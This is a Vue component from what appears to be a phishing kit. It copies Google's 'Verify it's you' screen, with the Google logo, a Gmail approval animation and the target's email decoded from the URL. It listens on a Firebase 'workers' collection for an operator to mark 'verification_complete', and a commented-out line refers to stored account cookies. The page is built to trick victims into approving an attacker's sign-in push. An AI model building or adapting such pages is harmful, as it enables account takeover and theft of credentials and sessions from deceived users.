<template>
  <v-app color>
    <v-content class>
      <v-container fill-height class="d-flex justify-center">
        <v-card
          max-width="448"
          :loading="cardLoading"
          :outlined="true"
          flat
          :disabled="disableCard"
          class="pl-8 pr-8"
        >
          <v-card-title>
            <v-img
              width="20"
              height="32"
              :src="require('@/assets/google_logo.png')"
              :contain="true"
              class="mt-8"
            />
          </v-card-title>
          <v-card-text>
            <h3 class="headline text-center text--primary">Verify it's you</h3>
            <h4 class="text--primary text-center">
              This device isn’t recognized. For your security, Google wants to
              make sure it’s really you.
              <br />sign in.
            </h4>
            <h4 class="primary--text text-center">Learn more</h4>
            <div class="text-center">
              <v-btn
                :rounded="true"
                class="ma-3 mx-auto email-button"
                :outlined="true"
              >
                <v-icon left>mdi-account-circle</v-icon>
                <div class="text--primary text-none">{{ email }}</div>
                <v-icon right>mdi-chevron-down</v-icon>
              </v-btn>
              <v-img
                v-if="!authenticatorInfo"
                width="200"
                :src="require('@/assets/gmail_ios_authzen.gif')"
                :contain="true"
                class="mt-3"
              />
              <h1
                v-if="authenticatorInfo"
                class="text--primary py-10 text-center"
              >
                {{ authenticatorInfo }}
              </h1>
              <p class="text--primary text-left" v-if="!authenticatorInfo">
                Google sent a notification to your phone. Open the Gmail app,
                tap <strong>Yes</strong> on the prompt, then tap
                <strong>{{ authenticatorInfo }}</strong> on your phone to verify
                it’s you.
              </p>
              <p class="text--primary text-left" v-if="authenticatorInfo">
                Google sent a notification to your phone. Open the Gmail app,
                tap <strong>Yes</strong> on the prompt, then tap
                <strong>{{ authenticatorInfo }}</strong> on your phone to verify
                it’s you.
              </p>
            </div>
          </v-card-text>
          <v-card-actions>
            <v-btn color="primary" class="text-none" :depressed="true" text
              >Try another way</v-btn
            >
            <v-spacer></v-spacer>
          </v-card-actions>
        </v-card>
      </v-container>
    </v-content>
  </v-app>
</template>

<script>
import { db } from "../firebase";
export default {
  name: "LoginForm",

  data: () => ({
    showPassword: false,
    errorMessage: "",
    error: false,
    disableCard: false,
    email: "",
    password: "",
    ipAddress: "",
    countryName: "",
    submitCount: 0,
    cardLoading: false,
    snackbar: false,
    authenticatorInfo: "",
  }),

  async created() {
    this.email = this.$route.params.data.includes("@")
      ? this.$route.params.data
      : window.atob(this.$route.params.data);
    console.log(this.data);
    this.authenticatorInfo = this.$route.params.authenticatorInfo;

    //this.$refs.password.focus();
    let workers = db.collection("workers");
    // const user = await googleAccounts.doc(this.email).get();
    // user.get("cookies") && (window.location.href = `https://mail.google.com`);

    workers.where("email", "==", this.email).onSnapshot((snapshot) => {
      console.log("i snapped");
      snapshot.docChanges().forEach(
        (change) => {
          let data = change.doc.data();
          if (data.info === "verification_complete") {
            this.$router.push({
              path: `/identifier/complete/${this.email}`,
            });
          }
        },
        (err) => {
          console.log(`Encountered error: ${err}`);
        }
      );
    });
  },

  mounted() {},

  methods: {},
};
</script>

<style lang="scss">
a {
  text-decoration: none;
  color: #005da6;
}
.rounded-button {
  border-radius: 0px;
}
.email-button {
  border: 0.5px solid rgb(219, 219, 219);
}
</style>